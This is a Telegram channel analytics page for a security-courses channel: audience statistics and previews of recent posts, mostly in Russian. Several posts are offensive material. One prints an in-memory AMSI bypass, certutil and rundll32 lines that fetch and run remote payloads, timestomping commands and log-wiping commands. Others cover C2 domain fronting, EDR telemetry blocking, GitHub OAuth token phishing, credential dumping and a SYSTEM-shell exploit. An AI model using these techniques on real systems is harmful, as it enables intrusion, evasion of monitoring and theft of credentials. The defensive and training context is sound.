uk
Feedback
All Security Engineering Courses

All Security Engineering Courses

Відкрити в Telegram

This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmark me!

Показати більше

📈 Аналітичний огляд Telegram-каналу All Security Engineering Courses

Канал All Security Engineering Courses (@allsecurityengineeringcourses) у мовному сегменті Англійська є активним учасником. На даний момент спільнота об'єднує 18 883 підписників, посідаючи 7 022 місце в категорії Технології та додатки та 35 455 місце у регіоні Росія.

📊 Показники аудиторії та динаміка

З моменту свого створення невідомо, проект продемонстрував стрімке зростання, зібравши аудиторію у 18 883 підписників.

За останніми даними від 04 липня, 2026, канал демонструє стабільну активність. Хоча за останні 30 днів спостерігається зміна кількості учасників на 114, а за останні 24 години на 12, загальне охоплення залишається високим.

  • Статус верифікації: Не верифікований
  • Рівень залученості (ER): Середній показник залученості аудиторії становить 10.65%. Протягом перших 24 годин після публікації контент зазвичай збирає 3.36% реакцій від загальної кількості підписників.
  • Охоплення публікацій: В середньому кожен допис отримує 2 010 переглядів. Протягом першої доби публікація в середньому набирає 634 переглядів.
  • Реакції та взаємодія: Аудиторія активно підтримує контент: середня кількість реакцій на один пост – 3.
  • Тематичні інтереси: Контент зосереджений навколо ключових тем, таких як git, strace, github, linux, docker.

📝 Опис та контентна політика

Автор описує ресурс як майданчик для висловлення суб'єктивної думки:
This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmar...

Завдяки високій частоті оновлень (останні дані отримано 05 липня, 2026), канал підтримує актуальність та високий рівень охоплення публікацій. Аналітика показує, що аудиторія активно взаємодіє з контентом, що робить його важливою точкою впливу в категорії Технології та додатки.

18 883
Підписники
+1224 години
+327 днів
+11430 день

Триває завантаження даних...

Залучення підписників
липень '26
липень '26
+43
в 0 каналах
червень '26
+201
в 0 каналах
Get PRO
травень '26
+245
в 0 каналах
Get PRO
квітень '26
+165
в 0 каналах
Get PRO
березень '26
+92
в 0 каналах
Get PRO
лютий '26
+93
в 0 каналах
Get PRO
січень '26
+247
в 0 каналах
Get PRO
грудень '25
+252
в 2 каналах
Get PRO
листопад '25
+305
в 1 каналах
Get PRO
жовтень '25
+388
в 1 каналах
Get PRO
вересень '25
+224
в 0 каналах
Get PRO
серпень '25
+607
в 0 каналах
Get PRO
липень '25
+84
в 0 каналах
Get PRO
червень '25
+450
в 1 каналах
Get PRO
травень '25
+121
в 0 каналах
Get PRO
квітень '25
+81
в 1 каналах
Get PRO
березень '25
+38
в 0 каналах
Get PRO
лютий '25
+36
в 0 каналах
Get PRO
січень '25
+43
в 1 каналах
Get PRO
грудень '24
+139
в 0 каналах
Get PRO
листопад '24
+274
в 0 каналах
Get PRO
жовтень '24
+265
в 0 каналах
Get PRO
вересень '24
+3 110
в 0 каналах
Get PRO
серпень '24
+3 911
в 0 каналах
Get PRO
липень '24
+1 619
в 0 каналах
Get PRO
червень '24
+1 278
в 1 каналах
Get PRO
травень '24
+1 619
в 1 каналах
Get PRO
квітень '24
+1 749
в 0 каналах
Get PRO
березень '24
+1 921
в 1 каналах
Get PRO
лютий '24
+1 487
в 1 каналах
Get PRO
січень '24
+1 200
в 0 каналах
Get PRO
грудень '23
+846
в 0 каналах
Дата
Залучення підписників
Згадування
Канали
05 липня+8
04 липня+13
03 липня+6
02 липня+12
01 липня+4
Дописи каналу
Defense Evasion: как атакующий прячется от EDR и антивируса 👋 Приветствую в мире цифровой безопасности! Сегодня расскажу про
Defense Evasion: как атакующий прячется от EDR и антивируса 👋 Приветствую в мире цифровой безопасности! Сегодня расскажу про техники Defense Evasion - как атакующий скрывает свою активность от средств защиты уже после того как закрепился в системе.Defense Evasion - это не одна техника, а целый класс. Тут задача не выполнить действие тихо один раз, а сделать так чтобы весь дальнейший процесс не триггерил алерты. Без этого закрепление в системе бесполезно: EDR увидит подозрительный процесс через час и всё оборвёт. ⏺AMSI bypass - Windows Antimalware Scan Interface проверяет PowerShell-код перед выполнением. Атакующий патчит функцию проверки прямо в памяти:
$a = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
$b = $a.GetField('amsiInitFailed','NonPublic,Static')
$b.SetValue($null,$true)
После этого любой вредоносный скрипт проходит без сканирования - AMSI думает, что инициализация провалилась и просто пропускает всё дальше. ⏺Process injection - вместо запуска нового подозрительного процесса код внедряется в уже доверенный:
$proc = Get-Process -Name "explorer"
# Дальше через WriteProcessMemory и CreateRemoteThread
# внедряем shellcode в легитимный процесс
Для мониторинга - это выглядит, как обычный explorer.exe, а не как новый неизвестный бинарь - большинство базовых правил детекта смотрят именно на имя и происхождение процесса. ⏺Timestomping - меняем метки времени файла, чтобы он не выделялся среди системных:
# Linux
touch -r /bin/ls malicious_file
stat malicious_file

# Windows через PowerShell
(Get-Item file.exe).CreationTime = "01/15/2020 10:00:00"
Форензика часто ищет файлы созданные в момент инцидента - timestomping ломает эту эвристику полностью. ⏺Living off the land - используем только легитимные системные утилиты вместо своих инструментов, тогда сигнатурный детект бессилен:
# Скачивание файла через certutil вместо curl
certutil -urlcache -split -f http://10.0.0.1/payload.exe payload.exe

# Выполнение через rundll32
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://10.0.0.1/script.sct")
certutil и rundll32 подписаны Microsoft и есть на каждой Windows-машине - антивирус не может просто заблокировать их целиком. ⏺Log clearing - чистим или отключаем логирование там где были:
wevtutil cl Security
wevtutil cl System
# Linux
> /var/log/auth.log
history -c
Детектируется через поведенческий анализ а не сигнатуры: аномальная работа с памятью легитимных процессов, вызов certutil с параметром urlcache, массовая очистка логов сразу после подозрительной активности, несоответствие timestamp файла и записей в MFT. Sysmon Event ID 1 (создание процесса) и 10 (доступ к памяти процесса) - основа для детекта большинства этих техник. ZeroDay | Серверная Админа | #defenseevasion

2
Cloudflare-Redirector Domain fronting через CloudFlare с поддержкой разных #C2, нескольких доменов и вебсокета. #evasion #раб
Cloudflare-Redirector Domain fronting через CloudFlare с поддержкой разных #C2, нескольких доменов и вебсокета. #evasion #работягам Telegram ✉️ @freedomfox
854
3
Немає тексту...
1 372
4
🔅 Raspberry Pi Essential Training 📝 Learn the basic vocabulary of Raspberry Pi, as well as how to plug in peripherals and p
🔅 Raspberry Pi Essential Training 📝 Learn the basic vocabulary of Raspberry Pi, as well as how to plug in peripherals and perform basic computing tasks. You can also gain an understanding of the GPIO and Pico boards. 🌐 Author: Mark Niemann-Ross 🔰 Level: Beginner ⏰ Duration: 2h 19m 📋 Topics: Raspberry Pi, Internet of Things 🔗 Join Linkedin Learning for more courses
1 282
5
Social Analyzer: поиск профиля человека по тысяче сайтов 👋 Приветствую в мире цифровой безопасности! Поговорим об инструмент
Social Analyzer: поиск профиля человека по тысяче сайтов 👋 Приветствую в мире цифровой безопасности! Поговорим об инструменте для OSINT-разведки по социальным сетям и веб-сервисам. ⏺Social Analyzer ищет профиль человека по юзернейму на более чем 1000 сайтах сразу. В отличие от простых брутфорсеров вроде Sherlock, инструмент использует систему рейтинга от 0 до 100 для каждого найденного профиля - это сильно снижает количество ложных срабатываний, типичную проблему таких тулов. ⏺Под капотом несколько режимов анализа: fast прогоняет проверку быстро через HTTP-запросы, slow подключает реальный браузер через Selenium для сайтов с JS-защитой, а special содержит точечные детекты под конкретные платформы вроде Facebook или Gmail где можно искать даже по номеру телефона или имени без юзернейма. ⏺Установка через Python: sudo apt-get install python3 python3-pip git git clone https://github.com/qeeqbox/social-analyzer cd social-analyzer pip3 install -r requirements.txt ⏺Базовый поиск по юзернейму: python3 app.py --username "johndoe" ⏺Поиск по нескольким юзернеймам сразу для корреляции - если разные аккаунты используют похожие имена: python3 app.py --username "johndoe,janedoe" --metadata ⏺Фильтрация по типу сайтов и стране - не нужно прогонять все 1000 ресурсов когда интересны конкретные категории: python3 app.py --username "johndoe" --type "adult" python3 app.py --username "johndoe" --countries "ru us" --top 100 ⏺Получаем скриншоты найденных профилей и метаданные сразу - нужен установленный Chrome: python3 app.py --username "johndoe" --metadata --extract ⏺Фильтруем результаты по уверенности детекта чтобы не разбирать сотни ложных совпадений: python3 app.py --username "johndoe" --filter "good" python3 app.py --username "johndoe" --filter "good,maybe" ⏺Запуск как веб-приложение для более удобной работы через браузер: npm install npm start # доступно на http://0.0.0.0:9005/app.html ZeroDay | Белый Хакер | #Инструмент
2 086
6
🐍 5 Python-библиотек для автоматизации OSINT и пентеста Не пишите с нуля то, что уже есть в open-source. 1. Shodan — ищите у
🐍 5 Python-библиотек для автоматизации OSINT и пентеста Не пишите с нуля то, что уже есть в open-source. 1. Shodan — ищите устройства по всему миру через Python import shodan api = shodan.Shodan('API_KEY') results = api.search('apache') 2. python-nmap — автоматизируйте сканирование портов import nmap nm = nmap.PortScanner() nm.scan('192.168.1.0/24', '22-443') 3. requests — отправляйте HTTP-запросы и парсите ответы import requests r = requests.get('https://api.github.com') 4. beautifulsoup4 — парсинг HTML-страниц для сбора данных from bs4 import BeautifulSoup soup = BeautifulSoup(html, 'html.parser') 5. paramiko — работа с SSH (удалённое выполнение команд, передача файлов) import paramiko ssh = paramiko.SSHClient() ssh.connect('host', username='user', password='pass') 🎁 Установка одной командой: pip install shodan python-nmap requests beautifulsoup4 paramiko 😈 CodeGuard: PySec Edition | Чат
2 261
7
😃 Сброс истёкшего пароля доменной учетки через null‑session и SAMR Читал одну любопытную статейку на дф и наткнулся на метод сброса истёкшего пароля через null‑session. Суть: При ошибке STATUS_PASSWORD_MUST_CHANGE стандартные подходы с impacket-changepasswd и smbpasswd могут не отработать на новых Windows. Но есть фишка, для которой нужно найти хост с разрешённой null‑session (проверить через nxc smb $IP -u '' -p '') и выполнить: impacket-changepasswd -protocol smb-samr -newpass 'NewPass' 'domain\user:OldPass@<IP_с_null_sess> -dc-ip <IP_DC> При этом нужно использовать протокол smb-samr. Пример: impacket-changepasswd -protocol smb-samr -newpass 'NewP@ssw0rd321!' 'duty-free.cc/user1:P@ssw0rd12@192.168.78.2 -dc-ip 192.168.78.1 Почему это работает? Протокол SAMR (RPC-сервис управления учётками) позволяет сменить пароль без предварительной аутентификации — достаточно передать старый+новый пароль в RPC-вызов через анонимное подключение.
2 094
8
https://medium.com/@Mx0o14/mimikatz-cheatsheet-practical-credential-dumping-guide-from-labs-real-world-scenarios-8ec38625f666
2 603
9
Automatically change your IP Address every 10 seconds A simple and efficient tool to automatically change your IP address usi
Automatically change your IP Address every 10 seconds A simple and efficient tool to automatically change your IP address using Tor network at regular intervals. 🌀 Automatic IP rotation at user-defined intervals ⚡️ Uses Tor network for secure IP changes 🚀 Works on multiple Linux distributions ⚡️ Easy installation and setup 💘 Run without installation Supported Distributions Arch Linux / Manjaro Debian / Ubuntu Kali Linux Parrot OS Fedora OpenSUSE Link:- https://github.com/techchipnet/ip-changer Posted by @BugSec😈⭐️✅ Make Me Admin In Your Channel For Posting awesome content Learn Hacking From Basics to Elite Level💎
3 034
10
EDRChoker Client–server EDRs have an inherent weakness: they must maintain server connectivity to be effective. When isolated
EDRChoker Client–server EDRs have an inherent weakness: they must maintain server connectivity to be effective. When isolated from their server they lose much of their capability, and administrators can no longer collect or monitor logs from those agents. EDRChoker uses policy-based Quality of Service (QoS) to throttle EDR agents to the lowest bandwidth; when agents attempt to connect they will consistently time out due to the extremely low bandwidth. Blog: https://www.zerosalarium.com/2026/06/edrchoker-choking-telemetry-stream-block-edr.html In this article I present a technique for interfering with the client–server connection of an EDR. It’s different from EDR connection-blocking methods that use the Windows Firewall or the Windows Filtering Platform (WFP).
2 495
11
🔒 Проверка безопасности Linux за 5 минут — Lynis Установка: sudo apt install lynis Запуск аудита: sudo lynis audit system Чт
🔒 Проверка безопасности Linux за 5 минут — Lynis Установка: sudo apt install lynis Запуск аудита: sudo lynis audit system Что проверяет: ⚫️Пароли и учётные записи ⚫️Права на файлы (/etc, /var, /tmp) ⚫️Сетевые настройки (SSH, firewall, открытые порты) ⚫️Логирование и доступ к логам ⚫️Наличие бэкдоров и rootkit Пример вывода: [+] SSH — рекомендовано использовать ключи вместо паролей [!] /tmp не смонтирован с nodev Фикс проблем: sudo lynis audit system --quick sudo lynis audit system --fix 🔥 Бонус: Lynis даёт готовый совет по каждой найденной проблеме. 😈 CodeGuard: PySec Edition | Чат
2 829
12
The Phishy GitHub Issue Case As I’m interested in initial access, and more specifically in phishing, I started looking for wa
The Phishy GitHub Issue Case As I’m interested in initial access, and more specifically in phishing, I started looking for ways to target developers. What platform every developers uses today? You guessed it right (or just correctly read the title of this blog post) : GitHub. It is advertised as “a platform to create, store, manage and share code”. Every developer has a GitHub account and getting access to it mean getting access to their code. However, I was looking for lesser-know phishing technique, that doesn’t employ the usual Attacker-in-The-Middle approach. I stumbled upon several articles mentioning Fake Security Alerts using GitHub issues. Naturally, I decide to take a look at what it was. So let’s see how to setup this scenario for your next phishing campaign! MalGitApp A simple OAuth App designed to capture OAuth tokens when users authenticate through GitHub OAuth flow.
2 418
13
CompTIA AutoOps+ AT0-001 Exam Objectives (2.0)
2 433
14
🛡 AMSI Bypass via Page Guard Patchless-техника обхода AMSI — без перезаписи байтов AmsiScanBuffer и без hardware breakpoints
🛡 AMSI Bypass via Page Guard Patchless-техника обхода AMSI — без перезаписи байтов AmsiScanBuffer и без hardware breakpoints в базовом варианте. Суть: через NtProtectVirtualMemory на страницу памяти, содержащую AmsiScanBuffer, ставится PAGE_GUARD. При доступе к этой странице возникает STATUS_GUARD_PAGE_VIOLATION, который перехватывается через VEH. ​ Если исключение пришло именно на AmsiScanBuffer, хэндлер подменяет результат на AMSI_RESULT_CLEAN и делает early return, эмулируя завершение функции без патча её байтов. Так как guard-page — одноразовая ловушка, после первого срабатывания защита снимается. Поэтому в обработчике дополнительно используется Trap Flag: затем ловится STATUS_SINGLE_STEP, и PAGE_GUARD навешивается повторно. ​ Итог: байты функции остаются нетронутыми, а Dr0–Dr3 в этом варианте не используются, поэтому исчезают артефакты, характерные для inline patching и классических HWBP-обходов. Но это не означает «недетектируемость» вообще — современные поведенческие детекты всё ещё возможны. В улучшенном варианте (VEH²) hardware breakpoint выставляется прямо через CONTEXT.Dr* внутри самого VEH, без вызова SetThreadContext / NtSetContextThread. Это убирает один из заметных telemetry-path, на который отдельно обращают внимание исследователи. 📖 Research 🔗 shigshag.com/blog/amsi_page_guard 🔗 crowdstrike.com/blog/crowdstrike-investigates-threat-of-patchless-amsi-bypass-attacks/ 💻 PoC 🔗 github.com/vxCrypt0r/AMSI_VEH 🔗 fluxsec.red/veh-squared-rust #amsi #evasion #redteam #windows #maldev
2 553
15
https://referral.hackthebox.com/mzD7m9z
3 113
16
Most beginners quit Terraform before building their first real infrastructure. Not because Terraform is hard - the learning p
Most beginners quit Terraform before building their first real infrastructure. Not because Terraform is hard - the learning path is just scattered. So I turned it into a simple 10-day visual roadmap. Learn Terraform step by step: Day 1–2 → Fundamentals and workflow Day 3–4 → Variables, outputs, and state Day 5–6 → Resources, dependencies, and modules Day 7–8 → Expressions, lifecycle, and environments Day 9–10 → Best practices, security, and a real mini project The goal is simple: learn Terraform by building. If you’re starting from zero, this roadmap is for you 🚀 https://medium.com/@thetechfusionist/terraform-in-10-days-from-beginner-to-building-real-infrastructure-4ee1da613188
3 334
17
😐 Несколько примеров в дополнение к статье по анализу js бандлов • Извлечение JavaScript файлов из вложенных директорий find /path/to/your/folders -name "*.js" -exec mv {} /path/to/target/folder/ \; • Поиск API-ключей и секретов cat * | grep -rE "apikey|api_key|secret|token|password|auth|key|pass|user" • Обнаружение опасных вызовов функций cat * | grep -rE "eval|document\.write|innerHTML|setTimeout|setInterval|Function" • Проверка манипуляций с URL cat * | grep -rE "location\.href|location\.replace|location\.assign|window\.open" • Поиск междоменных запросов cat * | grep -rE "XMLHttpRequest|fetch|Access-Control-Allow-Origin|withCredentials" /path/to/js/files • Анализ использования postMessage cat * | grep -r "postMessage" • Поиск захардкоженных URL или эндпоинтов cat * | grep -rE "https?://|www\." • Поиск отладочной информации cat * | grep -rE "console\.log|debugger|alert|console\.dir" • Исследование обработки пользовательского ввода cat * | grep -rE "document\.getElementById|document\.getElementsByClassName|document\.querySelector|document\.forms"
0
18
😐 Несколько примеров в дополнение к статье по анализу js бандлов • Извлечение JavaScript файлов из вложенных директорий find /path/to/your/folders -name "*.js" -exec mv {} /path/to/target/folder/ \; • Поиск API-ключей и секретов cat * | grep -rE "apikey|api_key|secret|token|password|auth|key|pass|user" • Обнаружение опасных вызовов функций cat * | grep -rE "eval|document\.write|innerHTML|setTimeout|setInterval|Function" • Проверка манипуляций с URL cat * | grep -rE "location\.href|location\.replace|location\.assign|window\.open" • Поиск междоменных запросов cat * | grep -rE "XMLHttpRequest|fetch|Access-Control-Allow-Origin|withCredentials" /path/to/js/files • Анализ использования postMessage cat * | grep -r "postMessage" • Поиск захардкоженных URL или эндпоинтов cat * | grep -rE "https?://|www\." • Поиск отладочной информации cat * | grep -rE "console\.log|debugger|alert|console\.dir" • Исследование обработки пользовательского ввода cat * | grep -rE "document\.getElementById|document\.getElementsByClassName|document\.querySelector|document\.forms"
2 802
19
https://github.com/1N3/Sn1per
2 290
20
MiniPlasma (Windows unpatched LPE) CVE-2020-17103 was apparently not patched or the patch was reversed, regardless this the P
MiniPlasma (Windows unpatched LPE) CVE-2020-17103 was apparently not patched or the patch was reversed, regardless this the PoC for an LPE in cldflt.sys, weaponized to spawn a SYSTEM shell. Success rate may vary since it's a race condition.
2 268